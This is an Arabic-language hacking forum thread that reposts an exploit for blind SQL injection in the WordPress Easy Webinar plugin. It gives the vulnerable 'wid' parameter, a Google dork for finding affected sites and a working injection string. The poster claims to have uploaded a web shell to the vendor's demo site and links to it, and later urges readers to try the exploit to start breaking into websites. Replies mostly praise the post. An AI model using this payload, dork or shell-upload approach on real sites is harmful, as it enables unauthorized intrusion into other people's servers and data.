Wordpress Easy Webinar Plugin Blind SQL

Mr iNFiNiTi · منذ /11-29-2012, 06:37 PM

كود:

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability # Vendor Homepage: www.easywebinarplugin.com # Date: 10/26/2012 # Author: Robert Cooper (robert.cooper [at] areyousecure.net) # Tested on: [Linux/Windows 7] #Vulnerable Parameters: wid= # Google Dork: allinurl: get-widget.php?wid= ############################################################## Exploit: www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi] Note: The HTTP response will read 404, but this is false: www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x This will result in the page loading correctly and show that the plugin is vulnerable to injection (string). ############################################################## www.areyousecure.net # Shouts to the Belegit crew

شل على موقع الاضافة من رفعي

http://demo.easywebinarplugin.com/wp...n/webadmin.php

المصدر: development-point - للمزيد تابع : قسم الثغـرات

Wordpress Easy Webinar Plugin Blind SQL

DHooMi1000 · منذ /11-29-2012, 06:59 PM

مآشآء آلله

آبدآع والله

الله يعطيك الف الف الف عافيهه آإخخوي =) ...

تقبل مروريَ يَ بطلَ =) ...

Mr iNFiNiTi · منذ /11-29-2012, 07:12 PM

^^
الله يحييك قسم بالله منور الموضوع

SnipeR · منذ /11-29-2012, 07:33 PM

بارك الله فيك
شكرا لك

yousif zozo · منذ /11-29-2012, 11:58 PM

ماشاء الله

ثغرة جميلة انشالله تتم الاستفادة منها مع اني ليس لي خبرة كبيرة في المواقع

Mr iNFiNiTi · منذ /11-30-2012, 03:03 AM

حاول تطبيقها انشاء الله راح تدخل عالم اختراق المواقع
الله يعطيكم العافيه على المرور كلياتكن

slo00om · منذ /12-03-2012, 08:50 PM

الله يعطيك الف عافية مع اني ما اعرف اخترق مواقع

تسسلم
ان شا الله اتعلم

المواضيع المتشابهه للموضوع: Wordpress Easy Webinar Plugin Blind SQL
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
رفع شل على لوحه تحكم wordpress	انس العوادي	قسم اختراق المواقع والسيرفرات	15	09-04-2013 06:25 PM
ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities	MhWy	قسم الثغـرات	10	09-02-2013 02:21 AM
تخمين WordPress باستخدام مشروع Metasploit	SnipeR	قسم توزيعات أختبار الأخترآق المتقدم	1	08-30-2013 02:44 PM
حصريا Easy Driver Pro 8.0.3	‏windows 8	الأرشيف	0	11-04-2012 07:40 PM
برنامج تغيير الاي بيHide IP Easy ,الشرح التفصيلى لعملاق تغيير الايبى Hide IP Easy v5.2.0.6 Final	aaqassam	جديد البرامج والتطبيقات	2	11-01-2012 07:08 PM

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)

Wordpress Easy Webinar Plugin Blind SQL

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability # Vendor Homepage: www.easywebinarplugin.com # Date: 10/26/2012 # Author: Robert Cooper (robert.cooper areyousecure.net)